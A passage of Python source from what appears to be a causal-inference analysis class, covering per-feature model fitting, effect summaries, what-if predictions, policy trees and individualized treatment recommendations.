f"has length {len(categories)} while there are {len(categorical_inds)} categorical columns.")
# check for indices over the categorical expansion bound
invalid_inds = getattr(self, 'untrained_feature_indices_', [])
# assume we'll be able to train former failures this time; we'll add them back if not
invalid_inds = [(ind, reason) for (ind, reason) in invalid_inds if ind not in new_inds]
self._has_column_names = True
if self.feature_names is None:
if hasattr(X, "iloc"):
feature_names = X.columns
else:
self._has_column_names = False
feature_names = [f"x{i}" for i in range(X.shape[1])]
else:
feature_names = self.feature_names
self.feature_names_ = feature_names
min_counts = {}
for ind in new_inds:
column_text = self._format_col(ind)
if ind in categorical_inds:
cats, counts = np.unique(_safe_indexing(X, ind, axis=1), return_counts=True)
min_ind = np.argmin(counts)
n_cat = len(cats)
if n_cat > self.upper_bound_on_cat_expansion:
warnings.warn(f"{column_text} has more than {self.upper_bound_on_cat_expansion} "
f"values (found {n_cat}) so no heterogeneity model will be fit for it; "
"increase 'upper_bound_on_cat_expansion' to change this behavior.")
# can't remove in place while iterating over new_inds, so store in separate list
invalid_inds.append((ind, 'upper_bound_on_cat_expansion'))
elif counts[min_ind] < _CAT_LIMIT:
if self.skip_cat_limit_checks and (counts[min_ind] >= 5 or
(counts[min_ind] >= 2 and
self.heterogeneity_model != 'forest')):
# train the model, but warn
warnings.warn(f"{column_text}'s value {cats[min_ind]} has only {counts[min_ind]} instances in "
f"the training dataset, which is less than the lower limit ({_CAT_LIMIT}). "
"A model will still be fit because 'skip_cat_limit_checks' is True, "
"but this model may not be robust.")
min_counts[ind] = counts[min_ind]
elif counts[min_ind] < 2 or (counts[min_ind] < 5 and self.heterogeneity_model == 'forest'):
# no model can be trained in this case since we need more folds
warnings.warn(f"{column_text}'s value {cats[min_ind]} has only {counts[min_ind]} instances in "
"the training dataset, but linear heterogeneity models need at least 2 and "
"forest heterogeneity models need at least 5 instances, so no model will be fit "
"for this column")
invalid_inds.append((ind, 'cat_limit'))
else:
# don't train a model, but suggest workaround since there are enough instances of least
# populated class
warnings.warn(f"{column_text}'s value {cats[min_ind]} has only {counts[min_ind]} instances in "
f"the training dataset, which is less than the lower limit ({_CAT_LIMIT}), "
"so no heterogeneity model will be fit for it. This check can be turned off by "
"setting 'skip_cat_limit_checks' to True, but that may result in an inaccurate "
"model for this feature.")
invalid_inds.append((ind, 'cat_limit'))
for (ind, _) in invalid_inds:
new_inds.remove(ind)
# also remove from train_inds so we don't try to access the result later
train_inds.remove(ind)
if len(train_inds) == 0:
raise ValueError("No features remain; increase the upper_bound_on_cat_expansion and ensure that there "
"are several instances of each categorical value so that at least "
"one feature model can be trained.")
# extract subset of names matching new columns
new_feat_names = _safe_indexing(feature_names, new_inds)
cache_updates = dict(zip(new_inds,
joblib.Parallel(
n_jobs=self.n_jobs,
verbose=self.verbose
)(joblib.delayed(_process_feature)(
feat_name, feat_ind,
self.verbose, categorical_inds, categories, heterogeneity_inds, min_counts, y, X,
self.nuisance_models, self.heterogeneity_model, self.random_state, self._model_y,
self.cv, self.mc_iters)
for feat_name, feat_ind in zip(new_feat_names, new_inds))))
# track indices where an exception was thrown, since we can't remove from dictionary while iterating
inds_to_remove = []
for ind, value in cache_updates.items():
if isinstance(value, Exception):
# don't want to cache this failed result
inds_to_remove.append(ind)
train_inds.remove(ind)
invalid_inds.append((ind, value))
for ind in inds_to_remove:
del cache_updates[ind]
self._cache.update(cache_updates)
for ind in train_inds:
dict_update, result = self._cache[ind]
self._results.append(result)
for k in dict_update:
self._shared[k] += dict_update[k]
invalid_inds.sort()
self.untrained_feature_indices_ = invalid_inds
self.trained_feature_indices_ = train_inds
self.nuisance_models_ = self.nuisance_models
self.heterogeneity_model_ = self.heterogeneity_model
return self
def _format_col(self, ind):
if self._has_column_names:
return f"Column {ind} ({self.feature_names_[ind]})"
else:
return f"Column {ind}"
# properties to return from effect InferenceResults
@staticmethod
def _point_props(alpha):
return [(_CausalInsightsConstants.PointEstimateKey, 'point_estimate'),
(_CausalInsightsConstants.StandardErrorKey, 'stderr'),
(_CausalInsightsConstants.ZStatKey, 'zstat'),
(_CausalInsightsConstants.PValueKey, 'pvalue'),
(_CausalInsightsConstants.ConfidenceIntervalLowerKey, lambda inf: inf.conf_int(alpha=alpha)[0]),
(_CausalInsightsConstants.ConfidenceIntervalUpperKey, lambda inf: inf.conf_int(alpha=alpha)[1])]
# properties to return from PopulationSummaryResults
@staticmethod
def _summary_props(alpha):
return [(_CausalInsightsConstants.PointEstimateKey, 'mean_point'),
(_CausalInsightsConstants.StandardErrorKey, 'stderr_mean'),
(_CausalInsightsConstants.ZStatKey, 'zstat'),
(_CausalInsightsConstants.PValueKey, 'pvalue'),
(_CausalInsightsConstants.ConfidenceIntervalLowerKey, lambda inf: inf.conf_int_mean(alpha=alpha)[0]),
(_CausalInsightsConstants.ConfidenceIntervalUpperKey, lambda inf: inf.conf_int_mean(alpha=alpha)[1])]
# Converts strings to property lookups or method calls as a convenience so that the
# _point_props and _summary_props above can be applied to an inference object
@staticmethod
def _make_accessor(attr):
if isinstance(attr, str):
s = attr
def attr(o):
val = getattr(o, s)
if callable(val):
return val()
else:
return val
return attr
# Create a summary combining all results into a single output; this is used
# by the various causal_effect and causal_effect_dict methods to generate either a dataframe
# or a dictionary, respectively, based on the summary function passed into this method
def _summarize(self, *, summary, get_inference, props, expand_arr, drop_sample):
assert hasattr(self, "_results"), "This object has not been fit, so cannot get results"
# ensure array has shape (m,y,t)
def ensure_proper_dims(arr):
if expand_arr:
# population summary is missing sample dimension; add it for consistency
arr = np.expand_dims(arr, 0)
if self._vec_y:
# outcome dimension is missing; add it for consistency
arr = np.expand_dims(arr, axis=1)
assert 2 <= arr.ndim <= 3
# add singleton treatment dimension if missing
return arr if arr.ndim == 3 else np.expand_dims(arr, axis=2)
# store set of inference results so we don't need to recompute per-attribute below in summary/coalesce
infs = [get_inference(res) for res in self._results]
# each attr has dimension (m,y) or (m,y,t)
def coalesce(attr):
"""Join together the arrays for each feature"""
attr = self._make_accessor(attr)
# concatenate along treatment dimension
arr = np.concatenate([ensure_proper_dims(attr(inf))
for inf in infs], axis=2)
# for dictionary representation, want to remove unneeded sample dimension
# in cohort and global results
if drop_sample:
arr = np.squeeze(arr, 0)
return arr
return summary([(key, coalesce(val)) for key, val in props])
def _pandas_summary(self, get_inference, *, props, n,
expand_arr=False, keep_all_levels=False):
"""
Summarizes results into a dataframe.
Parameters
----------
get_inference : lambda
Method to get the relevant inference results from each result object
props : list of (string, string or lambda)
Set of column names and ways to get the corresponding values from the inference object
n : int
The number of samples in the dataset
expand_arr : boolean, default False
Whether to add a synthetic sample dimension to the result arrays when performing internal computations
keep_all_levels : boolean, default False
Whether to keep all levels, even when they don't take on more than one value;
Note that regardless of this argument the "sample" level will only be present if expand_arr is False
"""
def make_dataframe(props):
to_include = OrderedDict([(key, value.reshape(-1))
for key, value in props])
# TODO: enrich outcome logic for multi-class classification when that is supported
index = pd.MultiIndex.from_tuples([(i, outcome, res.feature_name, f"{lvl}v{res.feature_baseline}"
if res.feature_baseline is not None
else lvl)
for i in range(n)
for outcome in ["y0"]
for res in self._results
for lvl in res.feature_levels],
names=["sample", "outcome", "feature", "feature_value"])
if expand_arr:
# There is no actual sample level in this data
index = index.droplevel("sample")
if not keep_all_levels:
for lvl in index.levels:
if len(lvl) == 1:
if not isinstance(index, pd.MultiIndex):
# can't drop only level
index = pd.Index([self._results[0].feature_name], name="feature")
else:
index = index.droplevel(lvl.name)
return pd.DataFrame(to_include, index=index)
return self._summarize(summary=make_dataframe,
get_inference=get_inference,
props=props,
expand_arr=expand_arr,
drop_sample=False) # dropping the sample dimension is handled above instead
def _dict_summary(self, get_inference, *, n, props, kind, drop_sample=False, expand_arr=False, row_wise=False):
"""
Summarizes results into a dictionary.
Parameters
----------
get_inference : lambda
Method to get the relevant inference results from each result object
n : int
The number of samples in the dataset
props : list of (string, string or lambda)
Set of column names and ways to get the corresponding values from the inference object
kind : string
The kind of inference results to get (e.g. 'global', 'local', or 'cohort')
drop_sample : boolean, default False
Whether to drop the sample dimension from each array
expand_arr : boolean, default False
Whether to add an initial sample dimension to the result arrays
row_wise : boolean, default False
Whether to return a list of dictionaries (one dictionary per row) instead of
a dictionary of lists (one list per column)
"""
def make_dict(props):
# should be serialization-ready and contain no numpy arrays
res = _get_default_specific_insights(kind)
shared = self._shared
if row_wise:
row_data = {}
# remove entries belonging to row data, since we're including them in the list of nested dictionaries
for k in _get_data_causal_insights_keys():
del res[k]
shared = shared.copy() # copy so that we can modify without affecting shared state
# TODO: Note that there's no column metadata for the sample number - should there be?
for k in _get_column_causal_insights_keys():
# need to replicate the column info for each sample, then remove from the shared data
row_data[k] = shared[k] * n
del shared[k]
# NOTE: the flattened order has the ouptut dimension before the feature dimension
# which may need to be revisited once we support multiclass
row_data.update([(key, value.flatten()) for key, value in props])
# get the length of the list corresponding to the first dictionary key
# `list(row_data)` gets the keys as a list, since `row_data.keys()` can't be indexed into
n_rows = len(row_data[list(row_data)[0]])
res[_CausalInsightsConstants.RowData] = [{key: row_data[key][i]
for key in row_data} for i in range(n_rows)]
else:
res.update([(key, value.tolist()) for key, value in props])
return {**shared, **res}
return self._summarize(summary=make_dict,
get_inference=get_inference,
props=props,
expand_arr=expand_arr,
drop_sample=drop_sample)
def global_causal_effect(self, *, alpha=0.05, keep_all_levels=False):
"""
Get the global causal effect for each feature as a pandas DataFrame.
Parameters
----------
alpha : float, default 0.05
The confidence level of the confidence interval
keep_all_levels : bool, default False
Whether to keep all levels of the output dataframe ('outcome', 'feature', and 'feature_level')
even if there was only a single value for that level; by default single-valued levels are dropped.
Returns
-------
global_effects : pandas Dataframe
DataFrame with the following structure:
:Columns: ['point', 'stderr', 'zstat', 'pvalue', 'ci_lower', 'ci_upper']
:Index: ['feature', 'feature_value']
:Rows: For each feature that is numerical, we have an entry with index ['{feature_name}', 'num'], where
'num' is literally the string 'num' and feature_name is the input feature name.
For each feature that is categorical, we have an entry with index ['{feature_name}',
'{cat}v{base}'] where cat is the category value and base is the category used as baseline.
If all features are numerical then the feature_value index is dropped in the dataframe, but not
in the serialized dict.
"""
# a global inference indicates the effect of that one feature on the outcome
return self._pandas_summary(lambda res: res.global_inference, props=self._point_props(alpha),
n=1, expand_arr=True, keep_all_levels=keep_all_levels)
def _global_causal_effect_dict(self, *, alpha=0.05, row_wise=False):
"""
Gets the global causal effect for each feature as dictionary.
Dictionary entries for predictions, etc. will be nested lists of shape (d_y, sum(d_t))
Only for serialization purposes to upload to AzureML
"""
return self._dict_summary(lambda res: res.global_inference, props=self._point_props(alpha),
kind='global', n=1, row_wise=row_wise, drop_sample=True, expand_arr=True)
def _cohort_effect_inference(self, Xtest):
assert np.ndim(Xtest) == 2 and np.shape(Xtest)[1] == self._d_x, (
"Shape of Xtest must be compatible with shape of X, "
f"but got shape {np.shape(Xtest)} instead of (n, {self._d_x})"
)
def inference_from_result(result):
est = result.estimator
X = result.X_transformer.transform(Xtest)
if X.shape[1] == 0:
X = None
return est.const_marginal_ate_inference(X=X)
return inference_from_result
def cohort_causal_effect(self, Xtest, *, alpha=0.05, keep_all_levels=False):
"""
Gets the average causal effects for a particular cohort defined by a population of X's.
Parameters
----------
Xtest : array-like
The cohort samples for which to return the average causal effects within cohort
alpha : float, default 0.05
The confidence level of the confidence interval
keep_all_levels : bool, default False
Whether to keep all levels of the output dataframe ('outcome', 'feature', and 'feature_level')
even if there was only a single value for that level; by default single-valued levels are dropped.
Returns
-------
cohort_effects : pandas Dataframe
DataFrame with the following structure:
:Columns: ['point', 'stderr', 'zstat', 'pvalue', 'ci_lower', 'ci_upper']
:Index: ['feature', 'feature_value']
:Rows: For each feature that is numerical, we have an entry with index ['{feature_name}', 'num'], where
'num' is literally the string 'num' and feature_name is the input feature name.
For each feature that is categorical, we have an entry with index ['{feature_name}', '{cat}v{base}']
where cat is the category value and base is the category used as baseline.
If all features are numerical then the feature_value index is dropped in the dataframe, but not
in the serialized dict.
"""
return self._pandas_summary(self._cohort_effect_inference(Xtest),
props=self._summary_props(alpha), n=1,
expand_arr=True, keep_all_levels=keep_all_levels)
def _cohort_causal_effect_dict(self, Xtest, *, alpha=0.05, row_wise=False):
"""
Gets the cohort causal effects for each feature as dictionary.
Dictionary entries for predictions, etc. will be nested lists of shape (d_y, sum(d_t))
Only for serialization purposes to upload to AzureML
"""
return self._dict_summary(self._cohort_effect_inference(Xtest), props=self._summary_props(alpha),
kind='cohort', n=1, row_wise=row_wise, expand_arr=True, drop_sample=True)
def _local_effect_inference(self, Xtest):
assert np.ndim(Xtest) == 2 and np.shape(Xtest)[1] == self._d_x, (
"Shape of Xtest must be compatible with shape of X, "
f"but got shape {np.shape(Xtest)} instead of (n, {self._d_x})"
)
def inference_from_result(result):
est = result.estimator
X = result.X_transformer.transform(Xtest)
if X.shape[1] == 0:
X = None
eff = est.const_marginal_effect_inference(X=X)
if X is None:
# need to reshape the output to match the input
eff = eff._expand_outputs(Xtest.shape[0])
return eff
return inference_from_result
def local_causal_effect(self, Xtest, *, alpha=0.05, keep_all_levels=False):
"""
Gets the local causal effect for each feature as a pandas DataFrame.
Parameters
----------
Xtest : array-like
The samples for which to return the causal effects
alpha : float, default 0.05
The confidence level of the confidence interval
keep_all_levels : bool, default False
Whether to keep all levels of the output dataframe ('sample', 'outcome', 'feature', and 'feature_level')
even if there was only a single value for that level; by default single-valued levels are dropped.
Returns
-------
global_effect : pandas Dataframe
DataFrame with the following structure:
:Columns: ['point', 'stderr', 'zstat', 'pvalue', 'ci_lower', 'ci_upper']
:Index: ['sample', 'feature', 'feature_value']
:Rows: For each feature that is numeric, we have an entry with index
['{sampleid}', '{feature_name}', 'num'],
where 'num' is literally the string 'num' and feature_name is the input feature name and sampleid is
the index of the sample in Xtest.
For each feature that is categorical, we have an entry with index
['{sampleid', '{feature_name}', '{cat}v{base}']
where cat is the category value and base is the category used as baseline.
If all features are numerical then the feature_value index is dropped in the dataframe, but not
in the serialized dict.
"""
return self._pandas_summary(self._local_effect_inference(Xtest),
props=self._point_props(alpha), n=Xtest.shape[0], keep_all_levels=keep_all_levels)
def _local_causal_effect_dict(self, Xtest, *, alpha=0.05, row_wise=False):
"""
Gets the local feature importance as dictionary
Dictionary entries for predictions, etc. will be nested lists of shape (n_rows, d_y, sum(d_t))
Only for serialization purposes to upload to AzureML
"""
return self._dict_summary(self._local_effect_inference(Xtest), props=self._point_props(alpha),
kind='local', n=Xtest.shape[0], row_wise=row_wise)
def _safe_result_index(self, X, feature_index):
assert hasattr(self, "_results"), "This instance has not yet been fitted"
assert np.ndim(X) == 2 and np.shape(X)[1] == self._d_x, (
"Shape of X must be compatible with shape of the fitted X, "
f"but got shape {np.shape(X)} instead of (n, {self._d_x})"
)
(numeric_index,) = _get_column_indices(X, [feature_index])
bad_inds = dict(self.untrained_feature_indices_)
if numeric_index in bad_inds:
error = bad_inds[numeric_index]
col_text = self._format_col(numeric_index)
if error == 'cat_limit':
msg = f"{col_text} had a value with fewer than {_CAT_LIMIT} occurences, so no model was fit for it"
elif error == 'upper_bound_on_cat_expansion':
msg = (f"{col_text} had more distinct values than the setting of 'upper_bound_on_cat_expansion', "
"so no model was fit for it")
else:
msg = (f"{col_text} generated the following error during fitting, "
f"so no model was fit for it:\n{str(error)}")
raise ValueError(msg)
if numeric_index not in self.trained_feature_indices_:
raise ValueError(f"{self._format_col(numeric_index)} was not passed as a feature index "
"so no model was fit for it")
results = [res for res in self._results
if res.feature_index == numeric_index]
assert len(results) == 1
(result,) = results
return result
def _whatif_inference(self, X, Xnew, feature_index, y):
assert not self.classification, "What-if analysis cannot be applied to classification tasks"
assert np.shape(X)[0] == np.shape(Xnew)[0] == np.shape(y)[0], (
"X, Xnew, and y must have the same length, but have shapes "
f"{np.shape(X)}, {np.shape(Xnew)}, and {np.shape(y)}"
)
assert np.size(feature_index) == 1, f"Only one feature index may be changed, but got {np.size(feature_index)}"
T0 = _safe_indexing(X, feature_index, axis=1)
T1 = Xnew
result = self._safe_result_index(X, feature_index)
X = result.X_transformer.transform(X)
if X.shape[1] == 0:
X = None
inf = result.estimator.effect_inference(X=X, T0=T0, T1=T1)
# we want to offset the inference object by the baseline estimate of y
inf.translate(y)
return inf
def whatif(self, X, Xnew, feature_index, y, *, alpha=0.05):
"""
Get counterfactual predictions when feature_index is changed to Xnew from its observational counterpart.
Note that this only applies to regression use cases; for classification what-if analysis is not supported.
Parameters
----------
X: array-like
Features
Xnew: array-like
New values of a single column of X
feature_index: int or string
The index of the feature being varied to Xnew, either as a numeric index or
the string name if the input is a dataframe
y: array-like
Observed labels or outcome of a predictive model for baseline y values
alpha : float in [0, 1], default 0.05
Confidence level of the confidence intervals displayed in the leaf nodes.
A (1-alpha)*100% confidence interval is displayed.
Returns
-------
y_new: DataFrame
The predicted outputs that would have been observed under the counterfactual features
"""
return self._whatif_inference(X, Xnew, feature_index, y).summary_frame(alpha=alpha)
def _whatif_dict(self, X, Xnew, feature_index, y, *, alpha=0.05, row_wise=False):
"""
Get counterfactual predictions when feature_index is changed to Xnew from its observational counterpart.
Note that this only applies to regression use cases; for classification what-if analysis is not supported.
Parameters
----------
X: array-like
Features
Xnew: array-like
New values of a single column of X
feature_index: int or string
The index of the feature being varied to Xnew, either as a numeric index or
the string name if the input is a dataframe
y: array-like
Observed labels or outcome of a predictive model for baseline y values
alpha : float in [0, 1], default 0.05
Confidence level of the confidence intervals displayed in the leaf nodes.
A (1-alpha)*100% confidence interval is displayed.
row_wise : boolean, default False
Whether to return a list of dictionaries (one dictionary per row) instead of
a dictionary of lists (one list per column)
Returns
-------
dict : dict
The counterfactual predictions, as a dictionary
"""
inf = self._whatif_inference(X, Xnew, feature_index, y)
props = self._point_props(alpha=alpha)
res = _get_default_specific_insights('whatif')
if row_wise:
row_data = {}
# remove entries belonging to row data, since we're including them in the list of nested dictionaries
for k in _get_data_causal_insights_keys():
del res[k]
row_data.update([(key, self._make_accessor(attr)(inf).flatten()) for key, attr in props])
# get the length of the list corresponding to the first dictionary key
# `list(row_data)` gets the keys as a list, since `row_data.keys()` can't be indexed into
n_rows = len(row_data[list(row_data)[0]])
res[_CausalInsightsConstants.RowData] = [{key: row_data[key][i]
for key in row_data} for i in range(n_rows)]
else:
res.update([(key, self._make_accessor(attr)(inf).tolist()) for key, attr in props])
return res
def _tree(self, is_policy, Xtest, feature_index, *, treatment_costs=0,
max_depth=3, min_samples_leaf=2, min_impurity_decrease=1e-4,
include_model_uncertainty=False, alpha=0.05):
result = self._safe_result_index(Xtest, feature_index)
Xtest = result.X_transformer.transform(Xtest)
if Xtest.shape[1] == 0:
Xtest = None
if result.feature_baseline is None:
treatment_names = ['decrease', 'increase']
else:
treatment_names = [f"{result.feature_baseline}"] + \
[f"{lvl}" for lvl in result.feature_levels]
TreeType = SingleTreePolicyInterpreter if is_policy else SingleTreeCateInterpreter
intrp = TreeType(include_model_uncertainty=include_model_uncertainty,
uncertainty_level=alpha,
max_depth=max_depth,
min_samples_leaf=min_samples_leaf,
min_impurity_decrease=min_impurity_decrease,
random_state=self.random_state)
if is_policy:
intrp.interpret(result.estimator, Xtest,
sample_treatment_costs=treatment_costs)
if result.feature_baseline is None: # continuous treatment, so apply a treatment level 10% of typical
treatment_level = result.treatment_value * 0.1
# NOTE: this calculation is correct only if treatment costs are marginal costs,
# because then scaling the difference between treatment value and treatment costs is the
# same as scaling the treatment value and subtracting the scaled treatment cost.
#
# Note also that unlike the standard outputs of the SinglePolicyTreeInterpreter, for
# continuous treatments, the policy value should include the benefit of decreasing treatments
# (rather than just not treating at all)
#
# We can get the total by seeing that if we restrict attention to units where we would treat,
# 2 * policy_value - always_treat
# includes exactly their contribution because policy_value and always_treat both include it
# and likewise restricting attention to the units where we want to decrease treatment,
# 2 * policy_value - always-treat
# also computes the *benefit* of decreasing treatment, because their contribution to policy_value
# is zero and the contribution to always_treat is negative
treatment_total = (2 * intrp.policy_value_ - intrp.always_treat_value_.item()) * treatment_level
always_totals = intrp.always_treat_value_ * treatment_level
else:
treatment_total = intrp.policy_value_
always_totals = intrp.always_treat_value_
policy_values = treatment_total, always_totals
else: # no policy values for CATE trees
intrp.interpret(result.estimator, Xtest)
policy_values = None
return intrp, result.X_transformer.get_feature_names(self.feature_names_), treatment_names, policy_values
# TODO: it seems like it would be better to just return the tree itself rather than plot it;
# however, the tree can't store the feature and treatment names we compute here...
def plot_policy_tree(self, Xtest, feature_index, *, treatment_costs=0,
max_depth=3, min_samples_leaf=2, min_value_increase=1e-4, include_model_uncertainty=False,
alpha=0.05):
"""
Plot a recommended policy tree using matplotlib.
Parameters
----------
X : array-like
Features
feature_index
Index of the feature to be considered as treament
treatment_costs: array-like, default 0
Cost of treatment, as a scalar value or per-sample. For continuous features this is the marginal cost per
unit of treatment; for discrete features, this is the difference in cost between each of the non-default
values and the default value (i.e., if non-scalar the array should have shape (n,d_t-1))
max_depth : int, default 3
maximum depth of the tree
min_samples_leaf : int, default 2
minimum number of samples on each leaf
min_value_increase : float, default 1e-4
The minimum increase in the policy value that a split needs to create to construct it
include_model_uncertainty : bool, default False
Whether to include confidence interval information when building a simplified model of the cate model.
alpha : float in [0, 1], default 0.05
Confidence level of the confidence intervals displayed in the leaf nodes.
A (1-alpha)*100% confidence interval is displayed.
"""
intrp, feature_names, treatment_names, _ = self._tree(True, Xtest, feature_index,
treatment_costs=treatment_costs,
max_depth=max_depth,
min_samples_leaf=min_samples_leaf,
min_impurity_decrease=min_value_increase,
include_model_uncertainty=include_model_uncertainty,
alpha=alpha)
return intrp.plot(feature_names=feature_names, treatment_names=treatment_names)
def _policy_tree_output(self, Xtest, feature_index, *, treatment_costs=0,
max_depth=3, min_samples_leaf=2, min_value_increase=1e-4, alpha=0.05):
"""
Get a tuple of policy outputs.
The first item in the tuple is the recommended policy tree expressed as a dictionary.
The second item is the per-unit-average value of applying the learned policy; if the feature is continuous this
means the gain from increasing the treatment by 10% of the typical amount for units where the treatment should
be increased and decreasing the treatment by 10% of the typical amount when not.
The third item is the value of always treating. This is a list, with one entry per non-control-treatment for
discrete features, or just a single entry for continuous features, again increasing by 10% of a typical amount.
Parameters
----------
X : array-like
Features
feature_index
Index of the feature to be considered as treament
treatment_costs: array-like, default 0
Cost of treatment, as a scalar value or per-sample. For continuous features this is the marginal cost per
unit of treatment; for discrete features, this is the difference in cost between each of the non-default
values and the default value (i.e., if non-scalar the array should have shape (n,d_t-1))
max_depth : int, default 3
maximum depth of the tree
min_samples_leaf : int, default 2
minimum number of samples on each leaf
min_value_increase : float, default 1e-4
The minimum increase in the policy value that a split needs to create to construct it
alpha : float in [0, 1], default 0.05
Confidence level of the confidence intervals displayed in the leaf nodes.
A (1-alpha)*100% confidence interval is displayed.
Returns
-------
output : _PolicyOutput
"""
(intrp, feature_names, treatment_names,
(policy_val, always_trt)) = self._tree(True, Xtest, feature_index,
treatment_costs=treatment_costs,
max_depth=max_depth,
min_samples_leaf=min_samples_leaf,
min_impurity_decrease=min_value_increase,
alpha=alpha)
def policy_data(tree, node_id, node_dict):
return {'treatment': treatment_names[np.argmax(tree.value[node_id])]}
return _PolicyOutput(_tree_interpreter_to_dict(intrp, feature_names, policy_data),
policy_val,
{treatment_names[i + 1]: val
for (i, val) in enumerate(always_trt.tolist())},
treatment_names[0])
# TODO: it seems like it would be better to just return the tree itself rather than plot it;
# however, the tree can't store the feature and treatment names we compute here...
def plot_heterogeneity_tree(self, Xtest, feature_index, *,
max_depth=3, min_samples_leaf=2, min_impurity_decrease=1e-4,
include_model_uncertainty=False,
alpha=0.05):
"""
Plot an effect hetergoeneity tree using matplotlib.
Parameters
----------
X : array-like
Features
feature_index
Index of the feature to be considered as treament
max_depth : int, default 3
maximum depth of the tree
min_samples_leaf : int, default 2
minimum number of samples on each leaf
min_impurity_decrease : float, default 1e-4
The minimum decrease in the impurity/uniformity of the causal effect that a split needs to
achieve to construct it
include_model_uncertainty : bool, default False
Whether to include confidence interval information when building a simplified model of the cate model.
alpha : float in [0, 1], default 0.05
Confidence level of the confidence intervals displayed in the leaf nodes.
A (1-alpha)*100% confidence interval is displayed.
"""
intrp, feature_names, treatment_names, _ = self._tree(False, Xtest, feature_index,
max_depth=max_depth,
min_samples_leaf=min_samples_leaf,
min_impurity_decrease=min_impurity_decrease,
include_model_uncertainty=include_model_uncertainty,
alpha=alpha)
return intrp.plot(feature_names=feature_names,
treatment_names=treatment_names)
def _heterogeneity_tree_output(self, Xtest, feature_index, *,
max_depth=3, min_samples_leaf=2, min_impurity_decrease=1e-4,
include_model_uncertainty=False, alpha=0.05):
"""
Get an effect heterogeneity tree expressed as a dictionary.
Parameters
----------
X : array-like
Features
feature_index
Index of the feature to be considered as treament
max_depth : int, optional (default=3)
maximum depth of the tree
min_samples_leaf : int, optional (default=2)
minimum number of samples on each leaf
min_impurity_decrease : float, optional (default=1e-4)
The minimum decrease in the impurity/uniformity of the causal effect that a split needs to
achieve to construct it
include_model_uncertainty : bool, default False
Whether to include confidence interval information when building a simplified model of the cate model.
alpha : float in [0, 1], default 0.05
Confidence level of the confidence intervals displayed in the leaf nodes.
A (1-alpha)*100% confidence interval is displayed.
"""
intrp, feature_names, _, _ = self._tree(False, Xtest, feature_index,
max_depth=max_depth,
min_samples_leaf=min_samples_leaf,
min_impurity_decrease=min_impurity_decrease,
include_model_uncertainty=include_model_uncertainty,
alpha=alpha)
def hetero_data(tree, node_id, node_dict):
if include_model_uncertainty:
return {'effect': _sanitize(tree.value[node_id]),
'ci': _sanitize(node_dict[node_id]['ci'])}
else:
return {'effect': _sanitize(tree.value[node_id])}
return _tree_interpreter_to_dict(intrp, feature_names, hetero_data)
def individualized_policy(self, Xtest, feature_index, *, n_rows=None, treatment_costs=0, alpha=0.05):
"""
Get individualized treatment policy based on the learned model for a feature, sorted by the predicted effect.
Parameters
----------
Xtest: array-like
Features
feature_index: int or string
Index of the feature to be considered as treatment
n_rows: int, optional
How many rows to return (all rows by default)
treatment_costs: array-like, default 0
Cost of treatment, as a scalar value or per-sample. For continuous features this is the marginal cost per
unit of treatment; for discrete features, this is the difference in cost between each of the non-default
values and the default value (i.e., if non-scalar the array should have shape (n,d_t-1))
alpha: float in [0, 1], default 0.05
Confidence level of the confidence intervals
A (1-alpha)*100% confidence interval is returned
Returns
-------
output: DataFrame
Dataframe containing recommended treatment, effect, confidence interval, sorted by effect
"""
result = self._safe_result_index(Xtest, feature_index)
# get dataframe with all but selected column
orig_df = pd.DataFrame(Xtest, columns=self.feature_names_).rename(
columns={self.feature_names_[result.feature_index]: 'Current treatment'})
Xtest = result.X_transformer.transform(Xtest)
if Xtest.shape[1] == 0:
x_rows = Xtest.shape[0]
Xtest = None
if result.feature_baseline is None:
# apply 10% of a typical treatment for this feature
effect = result.estimator.effect_inference(Xtest, T1=result.treatment_value * 0.1)
else:
effect = result.estimator.const_marginal_effect_inference(Xtest)
if Xtest is None: # we got a scalar effect although our original X may have had more rows
effect = effect._expand_outputs(x_rows)
multi_y = (not self._vec_y) or self.classification
if multi_y and result.feature_baseline is not None and np.ndim(treatment_costs) == 2:
# we've got treatment costs of shape (n, d_t-1) so we need to add a y dimension to broadcast safely
treatment_costs = np.expand_dims(treatment_costs, 1)
effect.translate(-treatment_costs)
est = effect.point_estimate
est_lb = effect.conf_int(alpha)[0]
est_ub = effect.conf_int(alpha)[1]
if multi_y: # y was an array, not a vector
est = np.squeeze(est, 1)
est_lb = np.squeeze(est_lb, 1)
est_ub = np.squeeze(est_ub, 1)
if result.feature_baseline is None:
rec = np.empty(est.shape[0], dtype=object)
rec[est > 0] = "increase"
rec[est <= 0] = "decrease"
# set the effect bounds; for positive treatments these agree with
# the estimates; for negative treatments, we need to invert the interval
eff_lb, eff_ub = est_lb, est_ub
eff_lb[est <= 0], eff_ub[est <= 0] = -eff_ub[est <= 0], -eff_lb[est <= 0]
# the effect is now always positive since we decrease treatment when negative
eff = np.abs(est)
else:
# for discrete treatment, stack a zero result in front for control
zeros = np.zeros((est.shape[0], 1))
all_effs = np.hstack([zeros, est])
eff_ind = np.argmax(all_effs, axis=1)
treatment_arr = np.array([result.feature_baseline] + [lvl for lvl in result.feature_levels], dtype=object)
rec = treatment_arr[eff_ind]
# we need to call effect_inference to get the correct CI between the two treatment options
effect = result.estimator.effect_inference(Xtest, T0=orig_df['Current treatment'], T1=rec)
# we now need to construct the delta in the cost between the two treatments and translate the effect
current_treatment = orig_df['Current treatment'].values
if np.ndim(treatment_costs) >= 2:
# remove third dimenions potentially added
if multi_y: # y was an array, not a vector
treatment_costs = np.squeeze(treatment_costs, 1)
assert treatment_costs.shape[1] == len(treatment_arr) - 1, ("If treatment costs are an array, "
" they must be of shape (n, d_t-1),"
" where n is the number of samples"
" and d_t the number of treatment"
" categories.")
all_costs = np.hstack([zeros, treatment_costs])
# find cost of current treatment: equality creates a 2d array with True on each row,
# only if its the location of the current treatment. Then we take the corresponding cost.
current_cost = all_costs[current_treatment.reshape(-1, 1) == treatment_arr.reshape(1, -1)]
target_cost = np.take_along_axis(all_costs, eff_ind.reshape(-1, 1), 1).reshape(-1)
else:
assert isinstance(treatment_costs, (int, float)), ("Treatments costs should either be float or "
"a 2d array of size (n, d_t-1).")
all_costs = np.array([0] + [treatment_costs] * (len(treatment_arr) - 1))
# construct index of current treatment
current_ind = (current_treatment.reshape(-1, 1) ==
treatment_arr.reshape(1, -1)) @ np.arange(len(treatment_arr))
current_cost = all_costs[current_ind]
target_cost = all_costs[eff_ind]
delta_cost = current_cost - target_cost
# add second dimension if needed for broadcasting during translation of effect
if multi_y:
delta_cost = np.expand_dims(delta_cost, 1)
effect.translate(delta_cost)
eff = effect.point_estimate
eff_lb, eff_ub = effect.conf_int(alpha)
if multi_y: # y was an array, not a vector
